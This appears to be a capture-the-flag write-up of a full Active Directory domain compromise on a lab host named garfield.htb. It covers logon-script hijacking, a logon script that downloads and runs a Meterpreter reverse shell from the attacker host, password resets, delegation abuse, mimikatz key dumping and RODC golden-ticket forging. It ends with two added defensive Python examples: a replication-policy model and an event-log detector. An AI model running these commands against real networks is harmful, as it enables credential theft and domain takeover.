Target information
IP address: 10.129.214.84 (not fixed: the lab instance changes address between sessions, which is why some later commands reference other 10.129.x.x addresses)
Provided credentials: j.arbuckle / Th1sD4mnC4t!@1978
Reconnaissance
ICMP check
PING 10.129.214.84 (10.129.214.84) 56(84) bytes of data.
64 bytes from 10.129.214.84: icmp_seq=1 ttl=127 time=166 ms
64 bytes from 10.129.214.84: icmp_seq=2 ttl=127 time=173 ms
64 bytes from 10.129.214.84: icmp_seq=3 ttl=127 time=135 ms
64 bytes from 10.129.214.84: icmp_seq=4 ttl=127 time=143 ms
--- 10.129.214.84 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 135.072/154.438/173.155/15.657 ms
The path between attacker and target is healthy (four replies, no loss, roughly 150 ms RTT). The TTL of 127 is one below the Windows default of 128, which matches the two-hop distance nmap reports later.
Firewall check
# Nmap 7.98 scan initiated Thu Apr 9 07:01:00 2026 as: /usr/lib/nmap/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.214.84
Nmap scan report for 10.129.214.84
Host is up (0.20s latency).
All 65535 scanned ports on 10.129.214.84 are in ignored states.
Not shown: 65535 open|filtered tcp ports (no-response)
# Nmap done at Thu Apr 9 07:01:45 2026 -- 1 IP address (1 host up) scanned in 45.86 seconds
The FIN scan cannot separate open from filtered ports here, and on Windows it is a weak probe anyway (Windows does not implement the RFC 793 behaviour the scan relies on). What it does show is that every probe was silently dropped rather than answered with a RST, which is consistent with a host firewall; the connect scan below confirms this with 65513 filtered (no-response) ports.
Port scanning
TCP port scan results
# Nmap 7.98 scan initiated Thu Apr 9 07:05:56 2026 as: /usr/lib/nmap/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.214.84
Nmap scan report for 10.129.214.84
Host is up (0.27s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-09 07:07:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: garfield.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: garfield.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.garfield.htb
| Not valid before: 2026-02-13T01:10:36
|_Not valid after: 2026-08-15T01:10:36
| rdp-ntlm-info:
| Target_Name: GARFIELD
| NetBIOS_Domain_Name: GARFIELD
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: garfield.htb
| DNS_Computer_Name: DC01.garfield.htb
| DNS_Tree_Name: garfield.htb
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-09T07:08:56+00:00
|_ssl-date: 2026-04-09T07:09:36+00:00; +8h00m02s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49899/tcp open msrpc Microsoft Windows RPC
49971/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-04-09T07:08:57
|_ start_date: N/A
|_clock-skew: mean: 8h00m01s, deviation: 0s, median: 8h00m01s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 321.09 ms 10.10.16.1
2 321.29 ms 10.129.214.84
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 9 07:09:43 2026 -- 1 IP address (1 host up) scanned in 226.75 seconds
UDP open port list
# Nmap 7.98 scan initiated Thu Apr 9 07:10:46 2026 as: /usr/lib/nmap/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.214.84
Nmap scan report for 10.129.214.84
Host is up (0.20s latency).
Not shown: 65531 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
# Nmap done at Thu Apr 9 07:11:32 2026 -- 1 IP address (1 host up) scanned in 45.51 seconds
UDP service detail scan results
(none)
The scans show a Windows Server host (OS guess Windows Server 2019; the RDP NTLM info reports build 10.0.17763, which is Server 2019) running only domain controller services. The domain is garfield.htb and the DC host name is DC01. Note the +8h clock skew nmap reports between scanner and target: Kerberos rejects requests outside a 5-minute window, so synchronize the attacker clock with the DC (ntpdate against DC01, or run Kerberos tools under faketime) before any Kerberos-based step.
Service enumeration
DNS (port 53)
First, query the main records for the target domain with dig:
dig any garfield.htb @dc01.garfield.htb

Only records pointing at the domain controller come back; nothing else of interest.
SMB
Connect to the SMB service with impacket-smbclient using the provided credentials:
impacket-smbclient garfield.htb/j.arbuckle:'Th1sD4mnC4t!@1978'@dc01.garfield.htb

After connecting, enumerate the SYSVOL share. Under /garfield.htb/scripts/ there is a batch file, printerDetect.bat:

@echo off
echo Detecting installed printers...
echo ==============================
wmic printer get Name,DeviceID,PortName,DriverName,Shared,Status /format:table
echo.
echo Printer detection completed.
pause
The script only calls WMIC to list the printers attached to the host. More importantly, the directory turns out to be writable by the current user:

Nothing else suspicious was found.
Active Directory
Domain user enumeration
Since the challenge provides a low-privileged domain user, we can brute-force RIDs with impacket-lookupsid:
impacket-lookupsid garfield.htb/j.arbuckle:'Th1sD4mnC4t!@1978'@dc01.garfield.htb -domain-sids 40000

Account names collected:
Administrator Guest krbtgt DC01$ RODC01$
krbtgt_8245 j.arbuckle l.wilson l.wilson_adm
Domain relationship enumeration
Use bloodyAD to list the domain objects the current user j.arbuckle can write to:
bloodyAD -d garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --dc-ip 10.129.193.125 get writable --detail

j.arbuckle has write access to the scriptPath attribute of CN=Liz Wilson,CN=Users,DC=garfield,DC=htb and CN=Liz Wilson ADM,CN=Users,DC=garfield,DC=htb.
scriptPath defines the logon script run when the user logs on; the value is resolved relative to the NETLOGON share, i.e. the SYSVOL\garfield.htb\scripts directory found above:

Plan: set scriptPath on both user objects and drop a malicious script into the SYSVOL scripts directory, so that it executes automatically the next time either user logs on.
Nothing else was found.
Exploitation
Abusing the scriptPath attribute
During service enumeration we found that j.arbuckle can write the scriptPath attribute of the Liz Wilson and Liz Wilson ADM user objects and that the Scripts subdirectory of SYSVOL is writable. Pointing scriptPath at an uploaded script therefore gives code execution as those users.
First generate a reverse shell executable with msfvenom and start a Metasploit handler:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.58 LPORT=443 -f exe -o reverse443.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST 10.10.16.58
set LPORT 443
set ExitOnSession false
run -jz
Then write the batch script revshell.bat and serve the payload directory with Python's SimpleHTTPServer on port 80 (the backslashes in the Windows path are required; certutil writes the payload to C:\Windows\Temp and the script runs it immediately):
@echo off
certutil -urlcache -split -f http://10.10.16.58/reverse443.exe C:\Windows\Temp\reverse443.exe & C:\Windows\Temp\reverse443.exe
Upload the script to garfield.htb/Scripts/ with the SMB client, exit, and set the scriptPath attribute of the Liz Wilson object with bloodyAD:
bloodyAD -d garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --dc-ip 10.129.227.37 set object "CN=Liz Wilson,CN=Users,DC=garfield,DC=htb" scriptPath -v "revshell.bat"

The reverse shell comes back when Liz Wilson next logs on; the session runs as l.wilson.
BloodHound domain enumeration
With the shell as l.wilson, collect domain data for BloodHound. First upload the SharpHound.ps1 collector through meterpreter:
cd C:/Users/l.wilson/Desktop
upload ../../../../../../usr/share/sharphound/SharpHound.ps1
shell
Then start PowerShell, import the SharpHound module (Invoke-BloodHound lives in SharpHound.ps1, not PowerView.ps1) and start collection:
powershell -ep bypass
Import-Module ./SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputPrefix "l-wilson" -OutputDirectory ./
Download the resulting zip and import it into BloodHound. Start with the Shortest paths to Domain Admins query:

l.wilson and l.wilson_adm both have WinRM (PS-Remote) rights, but the shortest path does not lead any further. Next, list the objects l.wilson controls:

l.wilson has ForceChangePassword over l.wilson_adm. Looking at what l.wilson_adm controls in turn: it can add itself (AddSelf) to the RODC Administrators group and has WriteAccountRestrictions on the read-only domain controller's machine account, which is enough for a resource-based constrained delegation (RBCD) attack:

l.wilson_adm also has remote desktop (CanRDP) rights:

Decision: first reset the l.wilson_adm password via ForceChangePassword, then continue from that account.
Resetting the l.wilson_adm credential
The attack path is already clear from the BloodHound analysis, so use PowerView directly.
First upload PowerView.ps1:
upload ../../../../../../usr/share/windows-resources/powersploit/Recon/PowerView.ps1
shell
Then start PowerShell and import PowerView:
powershell -ep bypass
Import-Module ./PowerView.ps1
Finally create a SecureString and call Set-DomainUserPassword to set the l.wilson_adm password:
$newpass = ConvertTo-SecureString 'Asd310056' -AsPlainText -Force
Set-DomainUserPassword -Identity 'l.wilson_adm' -AccountPassword $newpass

With the password changed, log in over RDP with Remmina as l.wilson_adm:


Logged in.
Privilege escalation
Domain relationship collection
After logging in as l.wilson_adm, look for the next hop. Selecting the RODC01 machine account in BloodHound shows that it holds ForceChangePassword over the krbtgt_8245 account:

krbtgt_8245 is the RODC's own krbtgt account: tickets issued by RODC01 are encrypted and signed with this key rather than the domain krbtgt key, and the writable DC only honours an RODC-issued TGT for principals that RODC is allowed to cache. Searching turned up the "RODC golden ticket" technique: obtain the RODC krbtgt key, edit the RODC machine account's msDS-RevealOnDemandGroup (allow list) and msDS-NeverRevealGroup (deny list) so that the target account is revealable, forge a TGT with the RODC krbtgt key and RODC number, then send a TGS-REQ carrying KERB-KEY-LIST-REQ pre-authentication data to the writable DC, which answers with the target account's NTLM key. Details: RODC | The Hacker Recipes

Decision: first use l.wilson_adm's AddSelf and WriteAccountRestrictions rights to join RODC Administrators and obtain a service ticket for RODC01, then continue from there.
Getting SYSTEM on the read-only DC
First add l.wilson_adm to the RODC Administrators group with bloodyAD:
bloodyAD -d garfield.htb -u l.wilson_adm -p "Asd310056" --host dc01.garfield.htb add groupMember "RODC Administrators" "l.wilson_adm"

Success. Listing l.wilson_adm's writable objects again now shows write access to managedBy, msDS-RevealOnDemandGroup and msDS-NeverRevealGroup on the RODC01 machine account:
bloodyAD -d garfield.htb -u l.wilson_adm -p "Asd310056" --host dc01.garfield.htb get writable --detail

With the group membership in place, go back to the l.wilson_adm RDP session on DC01, open Remote Desktop Connection there, enter the host name rodc01.garfield.htb and the user name l.wilson_adm, click Connect and supply the password set earlier:


Minimize that RDP window for later. Now use WriteAccountRestrictions to obtain a service ticket for RODC01 and from there SYSTEM on it. First create an ordinary machine account misaka19008 with impacket-addcomputer, then write the RBCD attribute on RODC01$ and request a CIFS service ticket for RODC01 impersonating Administrator:
impacket-addcomputer -computer-name 'misaka19008$' -computer-pass "Asd310056" -dc-host dc01.garfield.htb garfield.htb/l.wilson_adm:"Asd310056"
impacket-rbcd -delegate-from 'misaka19008$' -delegate-to 'RODC01$' -action 'write' garfield.htb/l.wilson_adm:'Asd310056'
impacket-getST -spn 'cifs/rodc01.garfield.htb' -impersonate Administrator garfield.htb/'misaka19008$':'Asd310056'

We have a CIFS service ticket for RODC01. RODC01 sits on an internal network (192.168.100.2) reachable only from DC01, so impacket-psexec needs a pivot. In the RDP session, download the iox port forwarder (EddieIvan01/iox: Tool for port forwarding & intranet proxy) from the attacker machine and set up a reverse SOCKS tunnel:
# On Kali Linux VM
./iox proxy -l *2222 -l 1080 -k 314159
# On target machine
./iox.exe proxy -r *10.10.16.58:2222 -k 314159
Add the following to /etc/proxychains4.conf:
socks5 127.0.0.1 1080
With the tunnel up, run impacket-psexec through proxychains using the service ticket to get a SYSTEM session:
export KRB5CCNAME=/home/misaka19008/Documents/pentest_notes/garfield/Administrator@cifs_rodc01.garfield.htb@GARFIELD.HTB.ccache
proxychains4 -q -f proxychains4.conf impacket-psexec -k -no-pass rodc01.garfield.htb
Note: RODC01 needs an entry in /etc/hosts on the attacker machine; dig shows its address is 192.168.100.2.

Success. For convenience, download reverse443.exe again with certutil and spawn a Meterpreter session as SYSTEM on RODC01. The RODC golden ticket needs the AES256 key of krbtgt_8245, so upload mimikatz.exe and dump it from the RODC's LSA:
./mimikatz.exe "privilege::debug" "lsadump::lsa /inject" "exit"

The RODC krbtgt credential is recovered:
- Domain: garfield.htb
- Account: krbtgt_8245
- AES256 key: d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240
Everything needed for the RODC golden ticket is now in hand.
RODC golden ticket attack
Before forging the ticket, clear msDS-NeverRevealGroup on the RODC01 machine account and add the administrators group to msDS-RevealOnDemandGroup. Skipping this makes the KeyList request fail outright: the deny list wins over the allow list, Domain Admins are denied by default (through the Denied RODC Password Replication Group), and the default allow list does not cover the target account.
Back in the l.wilson_adm RDP session, download PowerView.ps1 from the attacker machine, import it and make both changes with Set-DomainObject (note that -Set replaces the attribute's existing values):
powershell -ep bypass
curl -Uri http://10.10.16.58/PowerView.ps1 -OutFile C:/Users/l.wilson_adm/Desktop/PowerView.ps1
Import-Module C:/Users/l.wilson_adm/Desktop/PowerView.ps1
Set-DomainObject -Identity "CN=RODC01,OU=DOMAIN CONTROLLERS,DC=GARFIELD,DC=HTB" -Clear 'msDS-NeverRevealGroup'
Set-DomainObject -Identity "CN=RODC01,OU=DOMAIN CONTROLLERS,DC=GARFIELD,DC=HTB" -Set @{'msDS-RevealOnDemandGroup'='CN=ADMINISTRATORS,CN=BUILTIN,DC=GARFIELD,DC=HTB'}
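To make the deny-wins rule concrete, the following added example (not code from the original writeup) evaluates an RODC Password Replication Policy the way the writable DC does when asked to reveal a principal's secrets: a principal is revealable only if it, or a group it belongs to at any nesting depth, is listed in msDS-RevealOnDemandGroup and none of them appears in msDS-NeverRevealGroup. The group membership is constructed; the Denied RODC Password Replication Group contents and the default msDS-NeverRevealGroup entries are the Windows defaults, the user names are the ones enumerated on this page. It compares the default policy with the state after the two Set-DomainObject calls above.

```python
"""RODC Password Replication Policy (PRP) evaluation, added example.

Models the reveal decision the writable DC makes for an RODC. Membership
below is constructed for the example; the Denied group contents and the
default msDS-NeverRevealGroup entries are the Windows defaults.
"""
from typing import Dict, Set, Tuple

DOMAIN = "DC=garfield,DC=htb"


def dn(cn: str, container: str = "CN=Users") -> str:
    return f"CN={cn},{container},{DOMAIN}"


BUILTIN_ADMINS = dn("Administrators", "CN=Builtin")
DENIED = dn("Denied RODC Password Replication Group")
ALLOWED = dn("Allowed RODC Password Replication Group")

# Group DN -> direct members (users or nested groups). Constructed.
MEMBERS: Dict[str, Set[str]] = {
    dn("Domain Admins"): {dn("Administrator")},
    BUILTIN_ADMINS: {dn("Administrator"), dn("Domain Admins")},
    DENIED: {
        dn("Domain Admins"), dn("Enterprise Admins"), dn("Schema Admins"),
        dn("Cert Publishers"), dn("Domain Controllers"),
        dn("Read-only Domain Controllers"), dn("Group Policy Creator Owners"),
        dn("krbtgt"),
    },
    ALLOWED: set(),
    dn("RODC Administrators"): {dn("l.wilson_adm")},
}

# Default PRP written to every RODC at promotion time (Windows defaults).
DEFAULT_NEVER_REVEAL: Set[str] = {
    DENIED, BUILTIN_ADMINS,
    dn("Account Operators", "CN=Builtin"),
    dn("Server Operators", "CN=Builtin"),
    dn("Backup Operators", "CN=Builtin"),
}
DEFAULT_REVEAL_ON_DEMAND: Set[str] = {ALLOWED}

# State after the two Set-DomainObject calls on this page:
# deny list cleared, allow list replaced by BUILTIN\Administrators.
ATTACK_NEVER_REVEAL: Set[str] = set()
ATTACK_REVEAL_ON_DEMAND: Set[str] = {BUILTIN_ADMINS}


def transitive_groups(principal: str, members: Dict[str, Set[str]]) -> Set[str]:
    """All groups the principal belongs to through any depth of nesting."""
    found: Set[str] = set()
    frontier = [principal]
    while frontier:
        node = frontier.pop()
        for group, direct in members.items():
            if node in direct and group not in found:
                found.add(group)
                frontier.append(group)
    return found


def prp_decision(principal: str, reveal_on_demand: Set[str],
                 never_reveal: Set[str],
                 members: Dict[str, Set[str]] = MEMBERS) -> Tuple[str, str]:
    """Return ('allow' | 'deny', reason). A deny entry always wins."""
    identities = {principal} | transitive_groups(principal, members)
    denied = identities & never_reveal
    if denied:
        return "deny", f"in msDS-NeverRevealGroup via {sorted(denied)[0]}"
    allowed = identities & reveal_on_demand
    if allowed:
        return "allow", f"in msDS-RevealOnDemandGroup via {sorted(allowed)[0]}"
    return "deny", "not covered by msDS-RevealOnDemandGroup"


def compare_policies(principal: str) -> Dict[str, str]:
    """Decision under the default PRP versus the attacker-modified PRP."""
    return {
        "default": prp_decision(principal, DEFAULT_REVEAL_ON_DEMAND,
                                DEFAULT_NEVER_REVEAL)[0],
        "modified": prp_decision(principal, ATTACK_REVEAL_ON_DEMAND,
                                 ATTACK_NEVER_REVEAL)[0],
    }


if __name__ == "__main__":
    for user in ("Administrator", "krbtgt", "l.wilson_adm"):
        print(user, compare_policies(dn(user)))
```

Under the default policy Administrator is denied twice over (member of BUILTIN\Administrators, and of Domain Admins inside the Denied group), so the KeyList request would be refused; after the modification it is allowed, while krbtgt and l.wilson_adm stay denied because nothing puts them in the new allow list. This is also why the two attributes are worth baselining on every RODC object: a cleared deny list or an allow list that suddenly names an admin group has no legitimate reason to appear.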

Success. Back in the SYSTEM Meterpreter session on RODC01, upload Rubeus (v2.3.3, from SharpCollection/NetFramework_4.7_x64/Rubeus.exe at master · Flangvik/SharpCollection) and forge the RODC golden ticket. /rodcNumber is the number in the krbtgt_8245 account name, /aes256 is the key dumped above and /sid is the domain SID (visible in the lookupsid output earlier):
powershell -ep bypass
./Rubeus.exe golden /rodcNumber:8245 /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 /user:Administrator /id:500 /domain:garfield.htb /sid:S-1-5-21-2502726253-3859040611-225969357

Success. Now use the forged Administrator TGT for the KeyList attack: a TGS-REQ for krbtgt/garfield.htb with the key list pre-authentication data, sent to DC01, which returns the domain administrator's NTLM key:
./Rubeus.exe asktgs /enctype:aes256 /keyList /ticket:ticket_2026_04_11_18_43_26_Administrator_to_krbtgt@GARFIELD.HTB.kirbi /service:krbtgt/garfield.htb /dc:dc01.garfield.htb

The domain administrator credential is recovered:
- Domain: garfield.htb
- Account: Administrator
- NTLM hash: EE238F6DEBC752010428F20875B092D5
The hash alone is enough for pass-the-hash (evil-winrm also accepts it with -H); resetting the built-in Administrator password is destructive and loud, and is done here purely for convenience. Use crackmapexec with the hash to run the password change:
crackmapexec smb dc01.garfield.htb -d garfield.htb -u Administrator -H "EE238F6DEBC752010428F20875B092D5" -x "net user Administrator Asd310056 /domain"
Then log in with evil-winrm:
evil-winrm -i dc01.garfield.htb -u Administrator -p "Asd310056"

Privilege escalation complete.
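The defender's view of this chain, as an added example that is not part of the original writeup: every step above except the final logins is a directory write on DC01 (scriptPath, a password reset, a group membership change, msDS-AllowedToActOnBehalfOfOtherIdentity, and the two RODC reveal lists), and each produces a Security event when directory-change auditing is enabled. The rules below run over constructed events that mirror those steps; the event IDs and field names are the real ones for 5136, 4724 and 4728/4732, while the flat CSV layout is an assumption about how a SIEM export delivers them.

```python
"""Detection of the directory writes used in this chain, added example.

Events are constructed to mirror the page's steps. Real event IDs:
5136 = directory service object modified (needs the "Audit Directory
Service Changes" subcategory and a SACL on the objects), 4724 = password
reset attempted, 4728/4732 = member added to a global / domain-local
security group. In 5136, OperationType %%14674 means "value added" and
%%14675 means "value deleted". The CSV shape is an assumption.
"""
import csv
import io
from typing import Dict, List

SENSITIVE_ATTRIBUTES = {
    "scriptPath": "logon script hijack, runs at the user's next logon",
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "resource-based constrained delegation",
    "msDS-RevealOnDemandGroup": "RODC password replication allow list",
    "msDS-NeverRevealGroup": "RODC password replication deny list",
}
WATCHED_GROUPS = {"RODC Administrators", "Allowed RODC Password Replication Group"}
OPERATION = {"%%14674": "added", "%%14675": "deleted"}

# Constructed sample events (one benign 5136 included as a control).
SAMPLE_EVENTS = """\
EventID,SubjectUserName,ObjectDN,AttributeLDAPDisplayName,AttributeValue,OperationType,TargetUserName,MemberName
5136,j.arbuckle,"CN=Liz Wilson,CN=Users,DC=garfield,DC=htb",scriptPath,revshell.bat,%%14674,,
5136,j.arbuckle,"CN=Liz Wilson,CN=Users,DC=garfield,DC=htb",description,Accounting,%%14674,,
4724,l.wilson,,,,,l.wilson_adm,
4732,l.wilson_adm,,,,,RODC Administrators,"CN=Liz Wilson ADM,CN=Users,DC=garfield,DC=htb"
5136,l.wilson_adm,"CN=RODC01,OU=Domain Controllers,DC=garfield,DC=htb",msDS-AllowedToActOnBehalfOfOtherIdentity,<security descriptor>,%%14674,,
5136,l.wilson_adm,"CN=RODC01,OU=Domain Controllers,DC=garfield,DC=htb",msDS-NeverRevealGroup,"CN=Denied RODC Password Replication Group,CN=Users,DC=garfield,DC=htb",%%14675,,
5136,l.wilson_adm,"CN=RODC01,OU=Domain Controllers,DC=garfield,DC=htb",msDS-RevealOnDemandGroup,"CN=Administrators,CN=Builtin,DC=garfield,DC=htb",%%14674,,
"""


def detect(csv_text: str) -> List[Dict[str, str]]:
    """Return one alert per matching event, in event order."""
    alerts: List[Dict[str, str]] = []
    for ev in csv.DictReader(io.StringIO(csv_text)):
        eid, actor = ev["EventID"], ev["SubjectUserName"]
        attr = ev["AttributeLDAPDisplayName"]
        if eid == "5136" and attr in SENSITIVE_ATTRIBUTES:
            op = OPERATION.get(ev["OperationType"], ev["OperationType"])
            alerts.append({
                "rule": "sensitive-attribute-write", "actor": actor,
                "target": ev["ObjectDN"],
                "detail": f"{attr} value {op}: {ev['AttributeValue']} "
                          f"({SENSITIVE_ATTRIBUTES[attr]})",
            })
        elif eid == "4724" and actor != ev["TargetUserName"]:
            # A reset by someone other than the account owner is what a
            # ForceChangePassword edge looks like on the wire.
            alerts.append({
                "rule": "password-reset-of-other-account", "actor": actor,
                "target": ev["TargetUserName"],
                "detail": "reset without the old password",
            })
        elif eid in ("4728", "4732") and ev["TargetUserName"] in WATCHED_GROUPS:
            alerts.append({
                "rule": "watched-group-membership-change", "actor": actor,
                "target": ev["TargetUserName"],
                "detail": f"member added: {ev['MemberName']}",
            })
    return alerts


def actor_chain(alerts: List[Dict[str, str]]) -> List[str]:
    """Distinct actors in first-seen order: the lateral movement path."""
    seen: List[str] = []
    for alert in alerts:
        if alert["actor"] not in seen:
            seen.append(alert["actor"])
    return seen


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for alert in found:
        print(alert["rule"], alert["actor"], "->", alert["target"], "|", alert["detail"])
    print("actor chain:", " -> ".join(actor_chain(found)))
```

The benign description change is not flagged, the six writes that make up the attack are, and ordering the alerts by actor reproduces the j.arbuckle to l.wilson to l.wilson_adm progression. 5136 only fires for attributes covered by a SACL, so the object-level audit entries for user objects and the RODC computer object have to exist before any of this is visible.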
